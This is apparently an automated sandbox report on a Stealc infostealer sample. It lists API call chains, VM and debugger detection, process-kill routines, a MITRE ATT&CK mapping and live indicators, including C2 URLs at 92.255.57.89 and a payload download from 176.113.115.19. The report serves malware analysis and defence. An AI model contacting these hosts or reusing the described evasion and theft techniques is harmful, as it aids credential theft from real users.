Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_009ECF47 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	8_2_009ECF47

Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe

Code function: 8_2_009F33F7 GetSystemInfo,wsprintfA,

8_2_009F33F7

Source: Amcache.hve.13.dr	Binary or memory string: VMware
Source: Amcache.hve.13.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.13.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.13.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.13.dr	Binary or memory string: VMware20,1hbin@
Source: DADE.tmp.exe, 00000008.00000002.1934122632.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: Amcache.hve.13.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.13.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.13.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: DADE.tmp.exe, 00000008.00000002.1934099181.0000000000A58000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware;
Source: ief722WreR.exe, 00000000.00000002.3676289540.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, ief722WreR.exe, 00000000.00000002.3676289540.0000000000B36000.00000004.00000020.00020000.00000000.sdmp, DADE.tmp.exe, 00000008.00000002.1934122632.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp, DADE.tmp.exe, 00000008.00000002.1934122632.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.13.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.13.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.13.dr	Binary or memory string: vmci.sys
Source: ief722WreR.exe, 00000000.00000003.3546343202.0000000000B9B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.13.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.13.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.13.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.13.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.13.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.13.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: DADE.tmp.exe, 00000008.00000002.1934099181.0000000000A58000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Amcache.hve.13.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.13.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.13.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.13.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.13.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.13.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.13.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.13.dr	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: Amcache.hve.13.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe

API call chain: ExitProcess graph end node

graph_8-34119

Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe

Code function: 8_2_00404980 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,GetProcessHeap,RtlAllocateHeap,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LdrInitializeThunk,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,VirtualProtect,

8_2_00404980

Source: C:\Users\user\Desktop\ief722WreR.exe

Code function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0042A3D3

Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe

Code function: 8_2_00404980 VirtualProtect 00000000,00000004,00000100,?

8_2_00404980

Source: C:\Users\user\Desktop\ief722WreR.exe

Code function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0041EC5E

Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_0042FE5F mov eax, dword ptr fs:[00000030h]	0_2_0042FE5F
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_00AF956B push dword ptr fs:[00000030h]	0_2_00AF956B
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_024B00C6 mov eax, dword ptr fs:[00000030h]	0_2_024B00C6
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_0248092B mov eax, dword ptr fs:[00000030h]	0_2_0248092B
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_02480D90 mov eax, dword ptr fs:[00000030h]	0_2_02480D90
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_004263C0 mov eax, dword ptr fs:[00000030h]	8_2_004263C0
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_009D0D90 mov eax, dword ptr fs:[00000030h]	8_2_009D0D90
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_009D092B mov eax, dword ptr fs:[00000030h]	8_2_009D092B
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_009F6627 mov eax, dword ptr fs:[00000030h]	8_2_009F6627
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_00A58FB3 push dword ptr fs:[00000030h]	8_2_00A58FB3

Source: C:\Users\user\Desktop\ief722WreR.exe

Code function: 0_2_0043BBC1 GetProcessHeap,

0_2_0043BBC1

Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0042A3D3
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_004104D3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_004104D3
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_00410666 SetUnhandledExceptionFilter,	0_2_00410666
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_0040F911 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0040F911
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_024AA63A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_024AA63A
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_0249073A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0249073A
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_0248FB78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0248FB78
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_024908CD SetUnhandledExceptionFilter,	0_2_024908CD
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_009F784F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_009F784F
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_009F9A10 SetUnhandledExceptionFilter,	8_2_009F9A10
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_009F7E31 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_009F7E31

Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: DADE.tmp.exe PID: 564, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_004246C0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,	8_2_004246C0
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_009F4897 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,	8_2_009F4897
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_009F4927 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,	8_2_009F4927

Source: C:\Users\user\Desktop\ief722WreR.exe

Process created: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe "C:\Users\user~1\AppData\Local\Temp\DADE.tmp.exe"

Jump to behavior

Source: C:\Users\user\Desktop\ief722WreR.exe

Code function: 0_2_0041077B cpuid

0_2_0041077B

Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_0043B00A
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: GetLocaleInfoW,	0_2_004351C0
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: EnumSystemLocalesW,	0_2_0043B2CD
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: EnumSystemLocalesW,	0_2_0043B282
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: EnumSystemLocalesW,	0_2_0043B368
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_0043B3F5
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: GetLocaleInfoW,	0_2_0043B645
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_0043B76E
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: GetLocaleInfoW,	0_2_0043B875
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_0043B942
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: EnumSystemLocalesW,	0_2_00434DCD
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_024BB271
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: EnumSystemLocalesW,	0_2_024B5034
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: GetLocaleInfoW,	0_2_024B5427
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: EnumSystemLocalesW,	0_2_024BB4E9
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: EnumSystemLocalesW,	0_2_024BB534
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: EnumSystemLocalesW,	0_2_024BB5CF
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: GetLocaleInfoW,	0_2_024BBADC
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_024BBBA9
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: GetLocaleInfoW,	0_2_024BB8AC
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: GetLocaleInfoW,	0_2_024BB8A3
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_024BB9D5
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	8_2_009F2F67

Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\ief722WreR.exe

Code function: 0_2_004103CD GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_004103CD

Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe

Code function: 8_2_004229E0 GetProcessHeap,HeapAlloc,GetUserNameA,

8_2_004229E0

Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe

Code function: 8_2_009F6587 GetTimeZoneInformation,

8_2_009F6587

Source: C:\Users\user\Desktop\ief722WreR.exe

Code function: 0_2_004163EA GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,

0_2_004163EA

Source: Amcache.hve.13.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.13.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.13.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.13.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.13.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 8.2.DADE.tmp.exe.9d0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.DADE.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.DADE.tmp.exe.24e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.DADE.tmp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.DADE.tmp.exe.24e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.DADE.tmp.exe.9d0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.1314965093.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1934122632.0000000000A77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DADE.tmp.exe PID: 564, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 8.2.DADE.tmp.exe.9d0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.DADE.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.DADE.tmp.exe.24e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.DADE.tmp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.DADE.tmp.exe.24e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.DADE.tmp.exe.9d0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.1314965093.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1934122632.0000000000A77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DADE.tmp.exe PID: 564, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_004218CC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,	0_2_004218CC
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_00420BF6 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	0_2_00420BF6
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_024A1B33 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,	0_2_024A1B33
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_024A0E5D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	0_2_024A0E5D

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Create Account	111 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	3 Clipboard Data	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	22 Software Packing	NTDS	44 System Information Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Query Registry	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	131 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Virtualization/Sandbox Evasion	DCSync	1 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	111 Process Injection	Proc Filesystem	12 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
ief722WreR.exe	45%	ReversingLabs
ief722WreR.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\ScreenUpdateSync[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\ScreenUpdateSync[1].exe	47%	ReversingLabs
C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	47%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://92.255.57.89/45c616e921a794b8.phpQ	100%	Avira URL Cloud	malware
http://92.255.57.89/697b92cb4e247842/sqlite3.dllll	100%	Avira URL Cloud	malware
http://92.255.57.89	100%	Avira URL Cloud	malware
http://92.255.57.89smss.exe	0%	Avira URL Cloud	safe
http://92.255.57.89/45c616e921a794b8.php	100%	Avira URL Cloud	malware
http://92.255.57.89/697b92cb4e247842/sqlite3.dllexe	100%	Avira URL Cloud	malware
http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE	0%	Avira URL Cloud	safe
http://92.255.57.89/45c616e921a794b8.phpwininit.exe	100%	Avira URL Cloud	malware
http://176.113.115.19/ScreenUpdateSync.exeM	0%	Avira URL Cloud	safe
http://92.255.57.89/697b92cb4e247842/sqlite3.dlll	100%	Avira URL Cloud	malware
http://92.255.57.89/	100%	Avira URL Cloud	malware
http://92.255.57.89/2b	100%	Avira URL Cloud	malware
http://92.255.57.89AKFBGC	0%	Avira URL Cloud	safe
http://176.113.115.19/ScreenUpdateSync.exexr	0%	Avira URL Cloud	safe
http://92.255.57.89/45c616e921a794b8.phpE	100%	Avira URL Cloud	malware
http://92.255.57.89/697b92cb4e247842/sqlite3.dll	100%	Avira URL Cloud	malware
http://176.113.115.19/ScreenUpdateSync.exe	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
post-to-me.com	104.21.56.70	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://92.255.57.89/45c616e921a794b8.php	true	Avira URL Cloud: malware	unknown
https://post-to-me.com/track_prt.php?sub=0&cc=DE	false		high
http://92.255.57.89/	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://92.255.57.89/45c616e921a794b8.phpQ	DADE.tmp.exe, 00000008.00000002.1934122632.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://92.255.57.89/697b92cb4e247842/sqlite3.dllll	DADE.tmp.exe, 00000008.00000002.1934122632.0000000000A77000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://post-to-me.com/track_prt.php?sub=&cc=DE	ief722WreR.exe, 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp	false		high
http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE	ief722WreR.exe, 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
http://92.255.57.89	DADE.tmp.exe, 00000008.00000002.1934043928.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, DADE.tmp.exe, 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmp, DADE.tmp.exe, 00000008.00000002.1934122632.0000000000A77000.00000004.00000020.00020000.00000000.sdmp, DADE.tmp.exe, 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmp	true	Avira URL Cloud: malware	unknown
http://92.255.57.89/697b92cb4e247842/sqlite3.dllexe	DADE.tmp.exe, 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: malware	unknown
http://92.255.57.89smss.exe	DADE.tmp.exe, 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: safe	unknown
https://post-to-me.com/track_prt.php?sub=	ief722WreR.exe	false		high
http://92.255.57.89/697b92cb4e247842/sqlite3.dlll	DADE.tmp.exe, 00000008.00000002.1934122632.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://176.113.115.19/ScreenUpdateSync.exeM	ief722WreR.exe, 00000000.00000002.3677983339.0000000003200000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://92.255.57.89/45c616e921a794b8.phpwininit.exe	DADE.tmp.exe, 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: malware	unknown
https://post-to-me.com/	ief722WreR.exe, 00000000.00000002.3676289540.0000000000B6F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://92.255.57.89AKFBGC	DADE.tmp.exe, 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.13.dr	false		high
